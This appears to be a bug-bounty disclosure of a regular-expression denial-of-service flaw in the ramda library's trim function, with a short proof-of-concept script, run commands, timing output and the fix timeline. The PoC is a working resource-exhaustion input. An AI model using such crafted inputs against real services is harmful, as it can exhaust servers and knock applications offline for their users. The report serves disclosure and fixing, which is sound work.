Inefficient Regular Expression Complexity in ramda/ramda

Valid

Reported on Aug 26th 2021

✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the ramda package. An attacker who can supply crafted input to the trim function can make an application consume an excessive amount of CPU.

Similar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753

🕵️‍♂️ Proof of Concept

Create the following poc.js:

// poc.js
var { trim } = require("ramda");

// Build the string "1", followed by n spaces, followed by "1".
// The whitespace run sits in the interior of the string, so a trim that
// uses a backtracking regular expression anchored at the end of the string
// retries the match from every space before giving up.
function build_blank(n) {
  var ret = "1";
  for (var i = 0; i < n; i++) {
    ret += " ";
  }
  return ret + "1";
}

// Measure the wall-clock time of a single trim call on the padded input.
var time = Date.now();
trim(build_blank(50000));
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost);

Execute the following commands in a terminal:

npm i ramda
node poc.js

Check the output:

time_cost: 2639

💥 Impact

This vulnerability can exhaust system resources and lead to crashes.

ready-research submitted a (2 years ago)

ready-research (Researcher), 2 years ago:

With the above patch, the output is

time_cost:  4
We have contacted a member of the ramda team and are waiting to hear back (2 years ago)
ready-research submitted a (2 years ago)
Scott Sauyet validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Scott Sauyet marked this as fixed with commit 37af6a 2 years ago
ready-research has been awarded the fix bounty
This vulnerability will not receive a CVE